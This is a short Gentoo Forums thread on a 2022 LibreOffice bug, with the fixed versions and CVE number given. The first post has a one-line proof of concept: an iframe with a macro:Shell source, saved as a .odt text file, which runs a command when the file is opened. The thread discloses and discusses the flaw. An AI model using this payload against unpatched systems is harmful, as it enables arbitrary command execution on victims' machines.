Gentoo Forums
Gentoo Forums
Gentoo Forums
Quick Search: in

  FAQ | Search | Memberlist | Usergroups | Statistics | Profile | Log in to check your private messages | Log in | Register

Strange security bug in LibreOffice
 View unanswered posts
View posts from last 24 hours

 
Reply to topic    Gentoo Forums Forum Index Networking & Security
View previous topic :: View next topic  
Author Message
mike155
Advocate
Advocate


Joined: 17 Sep 2010
Posts: 4438
Location: Frankfurt, Germany
PostPosted: Thu Oct 20, 2022 3:26 pm    Post subject: Strange security bug in LibreOffice Reply with quote
Create a plain text file 'test.odt' with the contents below:
Code:
<iframe src='macro:Shell("whatever")'></iframe>

and run
Code:
lowriter test.odt

It's hard to believe - but Libreoffice executes "whatever". :evil:

The bug seems to be fixed in LibreOffice 7.3.6 und 7.4.1.

See: https://www.heise.de/news/Jetzt-updaten-LibreOffice-beseitigt-kritische-Makroluecke-7315313.html
Back to top
View user's profile Send private message
sabayonino
Veteran
Veteran


Joined: 03 Jan 2012
Posts: 1045
PostPosted: Thu Oct 20, 2022 4:51 pm    Post subject: Reply with quote
Your security level for executing Macros is set to lower

Quote:
This document contains macros.

Macros may contain viruses. Execution of macros is disabled due to the current macro security setting in Tools - Options - LibreOffice - Security.

Therefore, some functionality may not be available.

_________________
LRS 64/32
Back to top
View user's profile Send private message
mike155
Advocate
Advocate


Joined: 17 Sep 2010
Posts: 4438
Location: Frankfurt, Germany
PostPosted: Thu Oct 20, 2022 5:12 pm    Post subject: Reply with quote
I tested with LibreOffice 7.0.4.2 / Debian and default settings. Macro Security level is "high". The bug is there.
Back to top
View user's profile Send private message
fedeliallalinea
Administrator
Administrator


Joined: 08 Mar 2003
Posts: 31447
Location: here
PostPosted: Thu Oct 20, 2022 5:24 pm    Post subject: Reply with quote
Moved from Gentoo Chat to Other Things Open Source.
Moved from Things Open Source to Other Networking & Security.
_________________
Questions are guaranteed in life; Answers aren't.
Back to top
View user's profile Send private message
sabayonino
Veteran
Veteran


Joined: 03 Jan 2012
Posts: 1045
PostPosted: Thu Oct 20, 2022 6:37 pm    Post subject: Reply with quote
CVE-2022-3140
_________________
LRS 64/32
Back to top
View user's profile Send private message
Display posts from previous:   
Reply to topic    Gentoo Forums Forum Index Networking & Security All times are GMT
Page 1 of 1

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum



 Links: forums.gentoo.org | www.gentoo.org | bugs.gentoo.org | wiki.gentoo.org | forum-mods@gentoo.org

Copyright 2001-2025 Gentoo Foundation, Inc. Designed by Kyle Manna © 2003; Style derived from original subSilver theme. | Hosting by Gossamer Threads Inc. © | Powered by phpBB 2.0.23-gentoo-p11 © 2001, 2002 phpBB Group
Privacy Policy